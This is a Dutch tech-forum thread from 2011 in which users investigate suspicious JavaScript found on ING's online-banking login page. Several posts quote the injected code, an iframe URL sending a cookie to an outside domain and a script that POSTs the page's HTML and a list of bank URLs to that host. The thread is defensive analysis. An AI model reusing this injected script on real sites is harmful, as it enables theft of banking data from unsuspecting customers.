En of ze nu daadwerkelijk gehacked zijn of niet, dit is wel een flater van vanjewelste met zulke obscure praktijken in de loginpagina voor je internet bankieren :X
En die ip's zijn van een VPS-in-the-cloud-provider.

donderdag 4 augustus 2011 17:37

Acties:
  • 0Henk 'm!
  • Mektheb
  • Registratie: December 2006
  • Laatst online: 23:37

Mektheb

Cloud schreef op donderdag 04 augustus 2011 @ 17:36:
Die beide domeinnamen primebyte.net en vsonicw.com zijn overigens door dezelfde partij geregistreerd. Beide domeinen resolven naar ip's die minimaal verschillen:

code:
1
2

www.primebyte.net - 178.79.159.123
www.vsonic.com    - 178.79.159.121


En of ze nu daadwerkelijk gehacked zijn of niet, dit is wel een flater van vanjewelste met zulke obscure praktijken in de loginpagina voor je internet bankieren :X
inderdaad, heb het altijd al zo onveilig gevonden het bankieren bij ING / Postbank.
Had liever een random generator gehad zoals bij ABN / Rabo.

Ben erg benieuwd wat het nu is, maar zaakje stinkt behoorlijk.

donderdag 4 augustus 2011 17:38

Acties:
  • 0Henk 'm!
  • Thralas
  • Registratie: December 2002
  • Laatst online: 01:25

Thralas

Ik ging er stiekem vanuit dat notabene een bank(!) genoeg aan IPS/IDS zou hebben om een codewijzigingen (waar dan ook) te detecteren en rapporteren.. Maar blijkbaar speelt dit al enkele uren?!

donderdag 4 augustus 2011 17:39

Acties:
  • 0Henk 'm!
  • frickY
  • Registratie: Juli 2001
  • Laatst online: 20:40

frickY

ThaNOD schreef op donderdag 04 augustus 2011 @ 17:34:
je log tin op ing via een proxy van waarchijnlijk kwaad willende. die zijn dan feitelijk ingelogd! en kunnen betalingen forceren!
Het leek mij juist dat er een iframe wordt gecreëerd met de eerder genoemde HTML, en die HTML vervolgens ook weer terug gepost wordt.

[Voor 0% gewijzigd door frickY op 04-08-2011 19:20. Reden: typo, aldus mijn vrouw :+]

donderdag 4 augustus 2011 17:40

Acties:
  • 0Henk 'm!
  • XeNeRgY
  • Registratie: Januari 2002
  • Niet online

XeNeRgY

Met hoe grote zekerheid kan er gesteld worden dat dit ook werkelijk gevaar oplevert? Uiteraard goed dat er ontdekt en uitgezocht wordt dat eea niet in de haak is, maar in het begin van het topic was het nog een vraag en nu weten we ineens zeker dat er vanalles mis is? Is dit niet een beetje bangmakerij?

Overigens vind ik de manier van inloggen op ING sowieso vreemd. Wat mij betreft is een random reader een stuk veiliger.

donderdag 4 augustus 2011 17:43

Acties:
  • 0Henk 'm!
  • Lulukai
  • Registratie: Maart 2007
  • Laatst online: 21:41

Lulukai

God's gift to women

Benieuwd welke veronderstellingen hiervan juist zullen blijken te zijn en welke niet. Het echte verhaal zullen we waarschijnlijk nooit weten, maar binnen enkele dagen zal er hopelijk al meer informatie voorhanden zijn.

.

donderdag 4 augustus 2011 17:43

Acties:
  • 0Henk 'm!
  • GlowMouse
  • Registratie: November 2002
  • Niet online

GlowMouse

Uit de Google cache van https://mijn.ing.nl/internetbankieren/SesamLoginServlet blijkt dat de code er op 2 augustus nog niet in zat.

donderdag 4 augustus 2011 17:43

Acties:
  • 0Henk 'm!
  • Brons
  • Registratie: April 2002
  • Laatst online: 16-03 02:52

Brons

Fail!

XeNeRgY schreef op donderdag 04 augustus 2011 @ 17:40:
Met hoe grote zekerheid kan er gesteld worden dat dit ook werkelijk gevaar oplevert? Uiteraard goed dat er ontdekt en uitgezocht wordt dat eea niet in de haak is, maar in het begin van het topic was het nog een vraag en nu weten we ineens zeker dat er vanalles mis is? Is dit niet een beetje bangmakerij?
Zelfs als dit legitiem is is het een gigantische fout van de ING. Dit zou nooit mogen gebeuren.

Als je naar de hosting en naar de anonieme domeinen kijkt is het eigenlijk al voldoende om aan te nemen dat dit fout is.

donderdag 4 augustus 2011 17:43

Acties:
  • 0Henk 'm!
  • Kees
  • Registratie: Juni 1999
  • Laatst online: 24-03 15:22

Kees

Serveradmin / BOFH / DoC
Soms is het heel gezond om paranoide te zijn als je aan het internetbankieren bent.

Helemaal als je browser ineens vage (lege) websites benaderd die bij een vps provider in utah geregd zijn en domeinnamen gebruikt die redelijk recent geregistreerd zijn, en verder veel (13kb) data POST naar een volledig onbekende derde partij op het moment dat je op 'inloggen' clicked.

"Een serveradmin, voluit een serveradministrator, is dan weer een slavenbeheerder oftewel een slavendrijver" - Rataplan

donderdag 4 augustus 2011 17:43

Acties:
  • 0Henk 'm!
  • Vos
  • Registratie: Juni 2000
  • Laatst online: 22:39

Vos

AFCA

Voor een betaling moet er altijd nog gebruik worden gemaakt van de TAN code. Met enkel de login kan iemand weinig?

#36

donderdag 4 augustus 2011 17:44

Acties:
  • 0Henk 'm!
  • Cloud
  • Registratie: November 2001
  • Laatst online: 24-03 09:23

Cloud

FP ProMod

Ex-moderatie mobster

@XeNeRgY
Mwa ik denk dat iedereen het er hier over eens is dat het absoluut niet fris ruikt; dit soort praktijken wil je gewoon eigenlijk niet zien op iets wat de meest veilige loginpagina op teh interwebz zou moeten zijn. We hebben nog geen bewijzen dat ze gehacked zijn (dat kan ook alleen de ING doen) maar ik zou als klant van de ING (wat ik niet ben) hier absoluut niet blij mee zijn.

@hierboven:
De Paypal-truc die waarover eerder op Tweakers.net bericht is, zou wel kunnen werken indien je iemands gebruikersnaam/wachtwoord af kunt troggelen.

[Voor 17% gewijzigd door Cloud op 04-08-2011 18:03]

Never attribute to malice that which can be adequately explained by stupidity. - Robert J. Hanlon
60% of the time, it works all the time. - Brian Fantana

donderdag 4 augustus 2011 17:44

Acties:
  • 0Henk 'm!
  • ThunderNet
  • Registratie: Juni 2004
  • Laatst online: 24-03 14:19

ThunderNet

Flits!

Vos schreef op donderdag 04 augustus 2011 @ 17:43:
Voor een betaling moet er altijd nog gebruik worden gemaakt van de TAN code. Met enkel de login kan iemand weinig?
paypal valideren, click'n'buy valideren, zijn toch al wat vervelende dingetjes

Heb je liever vooraf, of achteraf, dat ik zeg dat ik geen flauw idee heb wat ik doe?

donderdag 4 augustus 2011 17:44

Acties:
  • 0Henk 'm!
  • Paxlie
  • Registratie: Oktober 2000
  • Laatst online: 24-03 12:43

Paxlie

chaos en inslag

Kees schreef op donderdag 04 augustus 2011 @ 17:43:
Soms is het heel gezond om paranoide te zijn als je aan het internetbankieren bent.

Helemaal als je browser ineens vage (lege) websites benaderd die bij een vps provider in utah geregd zijn en domeinnamen gebruikt die redelijk recent geregistreerd zijn, en verder veel (13kb) data POST naar een volledig onbekende derde partij op het moment dat je op 'inloggen' clicked.
Dat is niet paranoide inderdaad. Er wordt continue gehamerd op het feit dat je alles moet controleren voor een veilige verbinding. Dit valt daar gewoon niet onder.

Wie werd waar wanneer geboren en waarom werd hij door wie hoe genoemd?
braque© zijn is een keuze

donderdag 4 augustus 2011 17:44

Acties:
  • 0Henk 'm!
  • Brad Pitt
  • Registratie: Oktober 2005
  • Laatst online: 23-03 10:36

Brad Pitt

Vos schreef op donderdag 04 augustus 2011 @ 17:43:
Voor een betaling moet er altijd nog gebruik worden gemaakt van de TAN code. Met enkel de login kan iemand weinig?
TD-er in "Verdachte dingen bij inloggen op mijn.in..."

Nickname does not reflect reality

donderdag 4 augustus 2011 17:44

Acties:
  • 0Henk 'm!
  • Flard
  • Registratie: Februari 2001
  • Laatst online: 24-03 08:37

Flard

XeNeRgY schreef op donderdag 04 augustus 2011 @ 17:40:
Met hoe grote zekerheid kan er gesteld worden dat dit ook werkelijk gevaar oplevert? Uiteraard goed dat er ontdekt en uitgezocht wordt dat eea niet in de haak is, maar in het begin van het topic was het nog een vraag en nu weten we ineens zeker dat er vanalles mis is? Is dit niet een beetje bangmakerij?
Het lijkt erop dat er vooralsnog geen persoonlijke gegevens (gebruikersnaam/wachtwoord) naar andere partijen worden verstuurd. Maar het feit dat kwaadwillenden (mogen we wel vanuit gaan) hun eigen code hebben weten te plaatsen op servers van de ING geeft aan dat je de server in z'n geheel beter niet kunt vertrouwen op het moment.
Overigens vind ik de manier van inloggen op ING sowieso vreemd. Wat mij betreft is een random reader een stuk veiliger.
Denk dat deze hack weinig te maken heeft met de manier van inloggen, dus commentaar daarop lijkt me een beetje off-topic.

donderdag 4 augustus 2011 17:44

Acties:
  • 0Henk 'm!
  • Tharulerz
  • Registratie: April 2009
  • Laatst online: 22-02 02:37

Tharulerz

Ongeacht dat ik denk dat dit hele zaakje stinkt, zie ik nog nergens waar je effectieve gegevens worden verstuurd naar hun... (mbv firebug en dergelijke). Iemand die ergens wel zijn wachtwoord en username over de lijn ziet gaan?

Edit: wat Flard dus zegt...

[Voor 6% gewijzigd door Tharulerz op 04-08-2011 17:45]

donderdag 4 augustus 2011 17:45

Acties:
  • 0Henk 'm!
  • mindcrash
  • Registratie: April 2002
  • Laatst online: 22-11-2019

mindcrash

Rebellious Monkey

XeNeRgY schreef op donderdag 04 augustus 2011 @ 17:40:
Met hoe grote zekerheid kan er gesteld worden dat dit ook werkelijk gevaar oplevert? Uiteraard goed dat er ontdekt en uitgezocht wordt dat eea niet in de haak is, maar in het begin van het topic was het nog een vraag en nu weten we ineens zeker dat er vanalles mis is? Is dit niet een beetje bangmakerij?
Omdat ING niet gebruik maakt van één a twéé hosting accountjes van een hosting provider in the middle of Utah waarvan vrijwel niemand in Nederland ooit heeft gehoord?

"The people who are crazy enough to think they could change the world, are the ones who do." -- Steve Jobs (1955-2011) , Aaron Swartz (1986-2013)

donderdag 4 augustus 2011 17:45

Acties:
  • 0Henk 'm!
  • Vos
  • Registratie: Juni 2000
  • Laatst online: 22:39

Vos

AFCA

Brad Pitt schreef op donderdag 04 augustus 2011 @ 17:44:
[...]

TD-er in "Verdachte dingen bij inloggen op mijn.in..."
Thnx, had ik niet gelezen.

#36

donderdag 4 augustus 2011 17:46

Acties:
  • 0Henk 'm!
  • Mektheb
  • Registratie: December 2006
  • Laatst online: 23:37

Mektheb

mindcrash schreef op donderdag 04 augustus 2011 @ 17:45:
[...]


Omdat ING niet gebruik maakt van één a twéé hosting accountjes van een hosting provider in the middle of Utah waarvan vrijwel niemand in Nederland ooit heeft gehoord?
Ja dat zal nog wel wat zijn, en als dat wel zo was dan zou die informatie toch afgeschermd moeten worden.

donderdag 4 augustus 2011 17:47

Acties:
  • 0Henk 'm!
  • mindcrash
  • Registratie: April 2002
  • Laatst online: 22-11-2019

mindcrash

Rebellious Monkey

Bovendien: gehacked is gehacked. Of de hacker nu succesvol is geweest ja of nee: hier moet gewoon direct aktie op ondernomen worden vanuit IT of Security punt uit.

"The people who are crazy enough to think they could change the world, are the ones who do." -- Steve Jobs (1955-2011) , Aaron Swartz (1986-2013)

donderdag 4 augustus 2011 17:48

Acties:
  • 0Henk 'm!
  • Paxlie
  • Registratie: Oktober 2000
  • Laatst online: 24-03 12:43

Paxlie

chaos en inslag

mindcrash schreef op donderdag 04 augustus 2011 @ 17:47:
Bovendien: gehacked is gehacked. Of de hacker nu succesvol is geweest ja of nee: hier moet gewoon direct aktie op ondernomen worden vanuit IT of Security punt uit.
Maar dat is dus niet duidelijk of ze gehackt zijn, kan ook nog een enorme development fail zijn. Al lijkt het daar niet op.

Wie werd waar wanneer geboren en waarom werd hij door wie hoe genoemd?
braque© zijn is een keuze

donderdag 4 augustus 2011 17:49

Acties:
  • 0Henk 'm!
  • Thralas
  • Registratie: December 2002
  • Laatst online: 01:25

Thralas

Snelle analyse van de unpacked JS:

- Zodra de pagina geladen is append hij een iframe in de DOM, met als source:

code:
1

http[s]://www.vsonicw.com/v4.0/33271/s0?em=$VAR_B&1=$VAR_F&2=$VAR_D$VAR_O


Waarbij:

$VAR_B = huidig protocol plus host (http://mijn.ing.nl)
$VAR_F = de cookie value van een variabele 'ak'
$VAR_D = returnvalue van isCompatible(), tenzij undefined (functie komt niet in de malware JS zelf voor)
$VAR_O = Een hardcoded querystring met een hoop banknamen. Waarschijnlijk om de request legit te laten lijken, of de data die hij verstuurt te obfuscaten.

donderdag 4 augustus 2011 17:51

Acties:
  • 0Henk 'm!
  • Worran
  • Registratie: Mei 2007
  • Niet online

Worran

chinezen zijn weer bezig :P

always under construction

donderdag 4 augustus 2011 17:51

Acties:
  • 0Henk 'm!
  • White_Collar
  • Registratie: Februari 2009
  • Laatst online: 21:15

White_Collar

Er is iets aan de hand. Ing webcare heeft het volgende tweet opeens weer verwijdert:

INGnl_webcare ING Webcare Team
@jordyboutier bedankt voor het aangeven. IK zal het neerleggen bij de verantwoordelijke afdeling. ^Hakim

[Voor 3% gewijzigd door White_Collar op 04-08-2011 17:52]

"The reason for time is so that everything doesn't happen at once"

donderdag 4 augustus 2011 17:52

Acties:
  • 0Henk 'm!
  • Kees
  • Registratie: Juni 1999
  • Laatst online: 24-03 15:22

Kees

Serveradmin / BOFH / DoC
Rekenblok schreef op donderdag 04 augustus 2011 @ 17:51:
Er is iets aan de hand. Ing webcare heeft het volgende tweet opeens weer verwijdert:

INGnl_webcare ING Webcare Team
@jordyboutier bedankt voor het aangeven. IK zal het neerleggen bij de verantwoordelijke afdeling. ^Hakim
komt omdat die er nog 2 keer staat ;) beetje dubbelposten.

http://twitter.com/#!/INGnl_webcare staat hij nog gewoon.

[Voor 6% gewijzigd door Kees op 04-08-2011 17:52]

"Een serveradmin, voluit een serveradministrator, is dan weer een slavenbeheerder oftewel een slavendrijver" - Rataplan

donderdag 4 augustus 2011 17:52

Acties:
  • 0Henk 'm!
  • Mektheb
  • Registratie: December 2006
  • Laatst online: 23:37

Mektheb

Rekenblok schreef op donderdag 04 augustus 2011 @ 17:51:
Er is iets aan de hand. Ing webcare heeft het volgende tweet opeens weer verwijdert:

INGnl_webcare ING Webcare Team
@jordyboutier bedankt voor het aangeven. IK zal het neerleggen bij de verantwoordelijke afdeling. ^Hakim
Ah NVM.

[Voor 9% gewijzigd door Mektheb op 04-08-2011 17:52]

donderdag 4 augustus 2011 17:53

Acties:
  • 0Henk 'm!
  • GlowMouse
  • Registratie: November 2002
  • Niet online

GlowMouse

Thralas schreef op donderdag 04 augustus 2011 @ 17:49:
Snelle analyse van de unpacked JS:

- Zodra de pagina geladen is append hij een iframe in de DOM, met als source:

code:
1

http[s]://www.vsonicw.com/v4.0/33271/s0?em=$VAR_B&1=$VAR_F&2=$VAR_D$VAR_O


Waarbij:

$VAR_B = huidig protocol plus host (http://mijn.ing.nl)
$VAR_F = de cookie value van een variabele 'ak'
$VAR_D = returnvalue van isCompatible(), tenzij undefined (functie komt niet in de malware JS zelf voor)
$VAR_O = Een hardcoded querystring met een hoop banknamen. Waarschijnlijk om de request legit te laten lijken, of de data die hij verstuurt te obfuscaten.
Die kun je ook in je browser openen en dan view source doen: link Direct daarna volgt de eerder door mij beschreven post.

donderdag 4 augustus 2011 17:53

Acties:
  • 0Henk 'm!
  • izzo
  • Registratie: Mei 2000
  • Laatst online: 12-03 21:41

izzo

Die link in het inlog scherm is ook op zijn plaats.

4 augustus - Veiligheidsnieuws Mijn ING

Veilig bankieren.

In de google cache van mijn.ing.nl van 2 aug wordt het script nog niet uitgevoerd btw.

donderdag 4 augustus 2011 17:54

Acties:
  • 0Henk 'm!
  • Cloud
  • Registratie: November 2001
  • Laatst online: 24-03 09:23

Cloud

FP ProMod

Ex-moderatie mobster

Mja als je die link kopieert stuurt hij gewoon in de response weer een soort-van HTML template terug, die aangevuld wordt met de invoer die je zelf geeft in de request string:

HTML:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

<script>
function getHTTPObject() { if (typeof XMLHttpRequest != 'undefined') { return new XMLHttpRequest(); } try { return new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { return new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } return false; }

try {
  var h = getHTTPObject();
  h.open("POST", "./s1", true);
  params = ["query=A%3Debc%255Febc1961%252Febc1961%252Easp%252Flogonnpbs%252Eco%252Eukybonline%252Eco%252Eukonline%252Ebankofamerica%252Ecom%252Fcgi%252Dbin%252Fias%252Faccounts%252Doverview%252E%252Ede%252Fportal%252Fportal%252FHome%252Edo%252Ehsbc%252Eco%252Euk%252F1%252F2%252Fpersonal%252F%252Ehalifax%252Donline%252Eco%252Euk%252FDisplayMyAccounts%253AviewMyAccountsnwolb%252Ecom%252FStatementsbanquepopulaire%252Efr%252Finversis%252Ecomwachovia%252Ecomibank%252Ebarclays%252Eco%252Euk%252FloginTFA%252Edomeine%252Edeutsche%252Dbank%252Ede%252Ftrxm%252Fdb%252Fitan%252Eauthorizationmijn%252Eing%252Enl%252Fco%252Doperativebank%252Eco%252Euk%252Fcorp%252FBANKAWAYgbw%252Eit%252Echase%252Ecom%252FMyAccountsbcp%252Eptmy%252Eebay%252Eco%252Euk%252Fws%252FeBayISAPI%252Edll%253FMyEbayManageTAN%262%3D0%26R%3Dnorisbank%252Ede%252F%252Ebanking%252Efirstdirect%252Ecom%252F1%252F2%252Fbanking%252Eanz%252Ecommyspace%252Ecom%252Fpaypal%252Esecure%252Farcot%252Eroyalbank%252Ecom%252FCapitalOne%255FConsumer%252F%252Fcmserver%252Fverify%252Ecfmmail%252Elive%252Ecom%252Fmailcapitalone%252EcomEBC%255FEBC1961%252FEBC1961%252EASP%252Flogonbepp%252Fsanpt%252Fusuarios%252Enwolb%252Eogin%252Easpx%253Frbbva%252Eesbbva%252Emobi%252Ecitizensbankonline%252Ecom%252Eindexsampopank%252E%252F%252Ecitibank%252Ecom%252FUS%252FJPS%252Fportal%252FHome%252Edoasnbank%252Enl%252F%261%3D%26em%3Dhttps%253A%252F%252Fmijn%252Eing%252Enl","app=v4","ak=","cm=0","html="+escape(document.body.innerHTML)].join("&");

  h.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  h.onreadystatechange = function() {  
                                if(h.readyState == 4 && h.status == 200) {
                                    var t = h.responseText;
                  if (t && t.length>0) { document.location.replace(t); }
                }
    }
  h.send(params);
} catch (e) {
}
</script>


Het lijkt iets met de POST te doen, maar wat? :? Ik ben geen javascript koning :P

Never attribute to malice that which can be adequately explained by stupidity. - Robert J. Hanlon
60% of the time, it works all the time. - Brian Fantana

donderdag 4 augustus 2011 17:55

Acties:
  • 0Henk 'm!
  • Resistor
  • Registratie: April 2001
  • Niet online

Resistor

Niet meggeren!

Tharulerz schreef op donderdag 04 augustus 2011 @ 17:44:
Ongeacht dat ik denk dat dit hele zaakje stinkt, zie ik nog nergens waar je effectieve gegevens worden verstuurd naar hun... (mbv firebug en dergelijke). Iemand die ergens wel zijn wachtwoord en username over de lijn ziet gaan?

Edit: wat Flard dus zegt...
Waarom zouden ze een login/pass plain text versturen? ik zou dat juist versleutelen, dan valt het minder op _dat_ ze verstuurd worden naar een andere partij.

What will end humanity? Artificial intelligence or natural stupidity?

donderdag 4 augustus 2011 17:56

Acties:
  • 0Henk 'm!
  • frickY
  • Registratie: Juli 2001
  • Laatst online: 20:40

frickY

Ze worden ook niet plaintext verstuurd.
Dus of ze worden niet verstuurd, of versleuteld. Maar om beide met zekerheid te zeggen moeten alle scripts ontleed worden.

Wat wel zeker is is dat dit dubieus is.

donderdag 4 augustus 2011 17:56

Acties:
  • 0Henk 'm!
  • Wilbert de Vries
  • Registratie: Augustus 2007
  • Laatst online: 17-03 22:37

Wilbert de Vries

Ex-hoofdredacteur
Ik heb ondertussen overigens ING aan de lijn gehad. Ik geloof dat er nu wat engineers worden opgetrommeld. Ik zou binnen een half uur worden teruggebeld.

donderdag 4 augustus 2011 17:57

Acties:
  • 0Henk 'm!
  • Tharulerz
  • Registratie: April 2009
  • Laatst online: 22-02 02:37

Tharulerz

Het lijkt iets met de POST te doen, maar wat? :?
@Resistor en @Cloud
Je kan in firebug perfect zien wat hij post, en daar zit geen username of wachtwoord bij. Hij post gewoon de hele inner html van de pagina op het moment dat je op inloggen klikt, maar die innerhtml neemt in firefox de value van input fields niet mee...

Misschien in andere browsers wel?

donderdag 4 augustus 2011 17:57

Acties:
  • 0Henk 'm!
  • Mektheb
  • Registratie: December 2006
  • Laatst online: 23:37

Mektheb

Wilbert de Vries schreef op donderdag 04 augustus 2011 @ 17:56:
Ik heb ondertussen overigens ING aan de lijn gehad. Ik geloof dat er nu wat engineers worden opgetrommeld. Ik zou binnen een half uur worden teruggebeld.
Duidelijke taal. :*)

donderdag 4 augustus 2011 17:59

Acties:
  • 0Henk 'm!
  • mindcrash
  • Registratie: April 2002
  • Laatst online: 22-11-2019

mindcrash

Rebellious Monkey

Cloud schreef op donderdag 04 augustus 2011 @ 17:54:
Mja als je die link kopieert stuurt hij gewoon in de response weer een soort-van HTML template terug, die aangevuld wordt met de invoer die je zelf geeft in de request string:

HTML:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

<script>
function getHTTPObject() { if (typeof XMLHttpRequest != 'undefined') { return new XMLHttpRequest(); } try { return new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { return new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } return false; }

try {
  var h = getHTTPObject();
  h.open("POST", "./s1", true);
  params = ["query=A%3Debc%255Febc1961%252Febc1961%252Easp%252Flogonnpbs%252Eco%252Eukybonline%252Eco%252Eukonline%252Ebankofamerica%252Ecom%252Fcgi%252Dbin%252Fias%252Faccounts%252Doverview%252E%252Ede%252Fportal%252Fportal%252FHome%252Edo%252Ehsbc%252Eco%252Euk%252F1%252F2%252Fpersonal%252F%252Ehalifax%252Donline%252Eco%252Euk%252FDisplayMyAccounts%253AviewMyAccountsnwolb%252Ecom%252FStatementsbanquepopulaire%252Efr%252Finversis%252Ecomwachovia%252Ecomibank%252Ebarclays%252Eco%252Euk%252FloginTFA%252Edomeine%252Edeutsche%252Dbank%252Ede%252Ftrxm%252Fdb%252Fitan%252Eauthorizationmijn%252Eing%252Enl%252Fco%252Doperativebank%252Eco%252Euk%252Fcorp%252FBANKAWAYgbw%252Eit%252Echase%252Ecom%252FMyAccountsbcp%252Eptmy%252Eebay%252Eco%252Euk%252Fws%252FeBayISAPI%252Edll%253FMyEbayManageTAN%262%3D0%26R%3Dnorisbank%252Ede%252F%252Ebanking%252Efirstdirect%252Ecom%252F1%252F2%252Fbanking%252Eanz%252Ecommyspace%252Ecom%252Fpaypal%252Esecure%252Farcot%252Eroyalbank%252Ecom%252FCapitalOne%255FConsumer%252F%252Fcmserver%252Fverify%252Ecfmmail%252Elive%252Ecom%252Fmailcapitalone%252EcomEBC%255FEBC1961%252FEBC1961%252EASP%252Flogonbepp%252Fsanpt%252Fusuarios%252Enwolb%252Eogin%252Easpx%253Frbbva%252Eesbbva%252Emobi%252Ecitizensbankonline%252Ecom%252Eindexsampopank%252E%252F%252Ecitibank%252Ecom%252FUS%252FJPS%252Fportal%252FHome%252Edoasnbank%252Enl%252F%261%3D%26em%3Dhttps%253A%252F%252Fmijn%252Eing%252Enl","app=v4","ak=","cm=0","html="+escape(document.body.innerHTML)].join("&");

  h.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  h.onreadystatechange = function() {  
                                if(h.readyState == 4 && h.status == 200) {
                                    var t = h.responseText;
                  if (t && t.length>0) { document.location.replace(t); }
                }
    }
  h.send(params);
} catch (e) {
}
</script>


Het lijkt iets met de POST te doen, maar wat? :?
Ik heb volgens mij een idee wat ze proberen te doen:

1) men neme een stel URLs en wat info van de huidige pagina
2) men verstuurd die met de huidige url
3) serverside wordt 'iets' gedaan
4) stuur lookalike URL terug
5) vervang huidige pagina door lookalike URL

"The people who are crazy enough to think they could change the world, are the ones who do." -- Steve Jobs (1955-2011) , Aaron Swartz (1986-2013)

donderdag 4 augustus 2011 17:59

Acties:
  • 0Henk 'm!
  • frickY
  • Registratie: Juli 2001
  • Laatst online: 20:40

frickY

Tharulerz schreef op donderdag 04 augustus 2011 @ 17:57:
[...]


@Resistor en @Cloud
Je kan in firebug perfect zien wat hij post, en daar zit geen username of wachtwoord bij. Hij post gewoon de hele inner html van de pagina op het moment dat je op inloggen klikt, maar die innerhtml neemt in firefox de value van input fields niet mee...

Misschien in andere browsers wel?
Het is toch ook niet de innerHtml van ING? In Chrome zie ik dat de HTML van vsonicw zelf weer wordt terug gestuurd.

@mindcrash
De document.location target het iframe zelf. Het is dus niet het parent-frame (je browser venster zelf) die van locatie veranderd.

[Voor 11% gewijzigd door frickY op 04-08-2011 18:00]

donderdag 4 augustus 2011 18:00

Acties:
  • 0Henk 'm!
  • Thralas
  • Registratie: December 2002
  • Laatst online: 01:25

Thralas

GlowMouse schreef op donderdag 04 augustus 2011 @ 17:53:
Die kun je ook in je browser openen en dan view source doen:
Doe maar voorzichtig met malware. Plus dat je met een statische analyse (in dit geval) alle mogelijke cases covered.

edit:
Hier stond onzin

[Voor 49% gewijzigd door Thralas op 04-08-2011 18:01]

donderdag 4 augustus 2011 18:01

Acties:
  • 0Henk 'm!
  • Dlocks
  • Registratie: Januari 2001
  • Laatst online: 03-12-2022

Dlocks

Wilbert de Vries schreef op donderdag 04 augustus 2011 @ 17:56:
Ik heb ondertussen overigens ING aan de lijn gehad. Ik geloof dat er nu wat engineers worden opgetrommeld. Ik zou binnen een half uur worden teruggebeld.
Je zou toch denken dat ING dit soort zaken constant monitoren en niet afankelijk hoeven te zijn van derden die toevallig iets ontdekken en het melden? Blijkbaar niet dus...
Pagina: 1 2 3 4 5 Laatste
Reageer

Tweakers maakt gebruik van cookies

Tweakers plaatst functionele en analytische cookies voor het functioneren van de website en het verbeteren van de website-ervaring. Deze cookies zijn noodzakelijk. Om op Tweakers relevantere advertenties te tonen en om ingesloten content van derden te tonen (bijvoorbeeld video's), vragen we je toestemming. Via ingesloten content kunnen derde partijen diensten leveren en verbeteren, bezoekersstatistieken bijhouden, gepersonaliseerde content tonen, gerichte advertenties tonen en gebruikersprofielen opbouwen. Hiervoor worden apparaatgegevens, IP-adres, geolocatie en surfgedrag vastgelegd.

Meer informatie vind je in ons cookiebeleid.

Sluiten

Toestemming beheren

Hieronder kun je per doeleinde of partij toestemming geven of intrekken. Meer informatie vind je in ons cookiebeleid.

Functioneel en analytisch

Deze cookies zijn noodzakelijk voor het functioneren van de website en het verbeteren van de website-ervaring. Klik op het informatie-icoon voor meer informatie. Meer details

janee

    Relevantere advertenties

    Dit beperkt het aantal keer dat dezelfde advertentie getoond wordt (frequency capping) en maakt het mogelijk om binnen Tweakers contextuele advertenties te tonen op basis van pagina's die je hebt bezocht. Meer details

    Tweakers genereert een willekeurige unieke code als identifier. Deze data wordt niet gedeeld met adverteerders of andere derde partijen en je kunt niet buiten Tweakers gevolgd worden. Indien je bent ingelogd, wordt deze identifier gekoppeld aan je account. Indien je niet bent ingelogd, wordt deze identifier gekoppeld aan je sessie die maximaal 4 maanden actief blijft. Je kunt deze toestemming te allen tijde intrekken.

    Ingesloten content van derden

    Deze cookies kunnen door derde partijen geplaatst worden via ingesloten content. Klik op het informatie-icoon voor meer informatie over de verwerkingsdoeleinden. Meer details

    janee